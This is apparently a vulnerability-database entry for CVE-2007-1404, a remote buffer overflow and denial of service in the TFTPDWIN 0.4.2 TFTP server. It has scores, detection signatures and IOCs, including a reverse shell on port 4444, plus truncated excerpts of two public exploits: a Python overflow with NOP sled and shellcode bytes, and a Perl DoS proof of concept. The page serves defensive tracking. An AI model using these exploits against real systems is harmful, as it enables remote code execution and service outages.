CVE-2007-1404
published 2007-03-10CVE-2007-1404: tftpd.exe in ProSysInfo TFTP Server TFTPDWIN 0.4.2 allows remote attackers to cause a denial of service via a long UDP packet that is not properly handled in a…
PriorityP341high7.3CVSS 2.0
AVAACMAuNCCINAC
EXPLOIT
EPSS
66.74%
99.2th percentile
tftpd.exe in ProSysInfo TFTP Server TFTPDWIN 0.4.2 allows remote attackers to cause a denial of service via a long UDP packet that is not properly handled in a recv_from call. NOTE: this issue might be related to CVE-2006-4948.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| prosysinfo | tftp_server_tftpdwin | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x00\x01\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x8b\xc3\x66\x05\x12\x01\x50\xc3
- →Trigger condition is a UDP packet to port 69 exceeding 516 bytes; any UDP datagram to TFTP port 69 with length > 516 bytes should be flagged. ↗
- →The exploit buffer begins with the two-byte TFTP opcode \x00\x01 (Read Request), followed by NOP sleds and shellcode — detect anomalously large TFTP RRQ packets on UDP/69. ↗
- →Post-exploitation reverse shell connects back on TCP port 4444; monitor for unexpected outbound telnet/TCP connections on port 4444 from the TFTP server process (tftpd.exe). ↗
- →The shellcode contains the ASCII string 'netascii' (\x6e\x65\x74\x61\x73\x63\x69\x69) near the end of the buffer payload; this can serve as a byte-pattern signature in UDP/69 traffic. ↗
- ·The buffer overflow exploit is noted to be sensitive to buffer length; payloads may vary across attack attempts, so signature-based detection should focus on packet size threshold (>516 bytes on UDP/69) rather than exact byte sequences alone. ↗
- ·This vulnerability may be related to CVE-2006-4948; detections covering one may partially cover the other, but they should be treated as distinct until confirmed. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)
exploitdb·2009-08-18
CVE-2007-1404 ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)
ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)
---
#!/usr/bin/python
#ProSysInfo TFTP Server TFTPDWIN 0.4.2
#Coded by Wraith
import os
import sys
import struct
import socket
import time
print "\nProSysInfo TFTP Server TFTPDWIN 0.4.2"
print "Note: This vuln is sensitive to different buffer length\n"
if len(sys.argv)!=2:
print "Usage: tftpdwin.py "
sys.exit(0)
buffer = "\x00\x01\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
buffer += "\x8b\xc3\x66\x05\x12\x01\x50\xc3" + "\x90"*57
buffer += "\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64"
buffer += "\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C"
buffer += "\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77"
buffer += "\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\x
Exploit-DB
ProSysInfo TFTP Server TFTPDWIN 0.4.2 - 'UDP' Denial of Service
exploitdb·2007-03-08
CVE-2007-1404 ProSysInfo TFTP Server TFTPDWIN 0.4.2 - 'UDP' Denial of Service
ProSysInfo TFTP Server TFTPDWIN 0.4.2 - 'UDP' Denial of Service
---
#!/usr/bin/perl
#
# TFTPDWIN Server UDP DOS 0.4.2 POC
# written By : Umesh Wanve ([email protected])
#
#-------------------------------------------------------------------------------
# TFTPDWIN Server is a Freeware TFTP server for Windows 9x/NT/XP.
# (http://www.tftpserver.prosysinfo.com.pl)
# A vulnerability has been identified in TFTP Server TFTPDWIN Server v0.4.2, which
# could be exploited by remote or local attackers to execute arbitrary commands
# or cause a denial of service. This flaw is when attacker sends UDP packet of length more than 516 bytes
#
#----------------------------Start of Code-------------------------------------
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET
No writeups or analysis indexed.
http://osvdb.org/33919http://secunia.com/advisories/24452https://exchange.xforce.ibmcloud.com/vulnerabilities/32886https://www.exploit-db.com/exploits/3432http://osvdb.org/33919http://secunia.com/advisories/24452https://exchange.xforce.ibmcloud.com/vulnerabilities/32886https://www.exploit-db.com/exploits/3432
2007-03-10
Published